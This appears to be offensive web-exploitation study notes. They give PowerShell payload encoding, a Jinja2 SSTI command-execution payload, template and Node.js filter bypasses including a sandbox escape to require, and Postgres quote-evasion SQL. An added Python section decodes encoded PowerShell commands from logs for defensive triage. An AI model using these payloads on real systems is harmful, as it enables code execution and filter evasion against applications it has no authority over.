Encoding PowerShell Payloads
iconv -f ASCII -t UTF-16LE shell.txt | base64 | tr -d "\n"
powershell -EncodedCommand [result_for_iconv]
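The defender's side of the same transform, as an added Python example that is not part of the original notes: it reverses the UTF-16LE-then-base64 encoding so an encoded argument seen in a process-creation log can be read in plain text during triage. The log line is constructed, and the short-switch handling assumes PowerShell's documented acceptance of any unambiguous prefix of `-EncodedCommand` (such as `-enc` or `-e`).

```python
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand, so match every
# prefix from "-e" up to the full switch name (longest first), then the blob.
_PREFIXES = "|".join(re.escape("encodedcommand"[:i]) for i in range(14, 0, -1))
ENCODED_CMD_RE = re.compile(rf"-(?:{_PREFIXES})\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_command(command: str) -> str:
    """Reproduce the iconv -t UTF-16LE | base64 | tr -d "\\n" pipeline."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str) -> str:
    """Reverse the encoding so the original script text can be inspected.
    Raises ValueError on malformed base64 or non-UTF-16LE content."""
    raw = base64.b64decode(blob, validate=True)
    return raw.decode("utf-16-le")


def extract_encoded_commands(log_line: str) -> list[str]:
    """Decode every encoded-command argument found in one log line.
    Blobs that do not decode cleanly are skipped instead of aborting triage."""
    found = []
    for match in ENCODED_CMD_RE.finditer(log_line):
        try:
            found.append(decode_encoded_command(match.group(1)))
        except ValueError:  # binascii.Error and UnicodeDecodeError both subclass it
            continue
    return found


# Constructed sample process-creation log line (not taken from any real system).
SAMPLE_LOG = "CommandLine: powershell.exe -NoProfile -enc RwBlAHQALQBEAGEAdABlAA=="

if __name__ == "__main__":
    for decoded in extract_encoded_commands(SAMPLE_LOG):
        print("decoded command:", decoded)
```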
SSTI Display Output
{{ subclasses_r[1153](['uname', '-a'], stdout=-1).communicate()}}
Bypass SSTI Filters
Hex Encoding
Source: https://medium.com/@nyomanpradipta120/jinja2-ssti-filter-bypasses-a8d3eb7b000f
{% set class = "\x5f\x5fmro\x5f\x5f"%}
Node Filter Bypass
Multi-slashing
cmd = "\\\\x2fbin\\\\x2fbash"
shell = 'process = parts.constructor.constructor(\'return (function(){return process})()\')(); var require = process.mainModule.require;'
Avoid Data Truncation in Fetch Request
Refer to 13.6.1
Parsing XML using ElementTree
Refer to 10.3.5
Other Filters
CHR + String Concatenation
SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);
Replacing Quotes (Postgres)
SELECT 'AWAE';
SELECT $$AWAE$$;
SELECT $TAG$AWAE$TAG$;
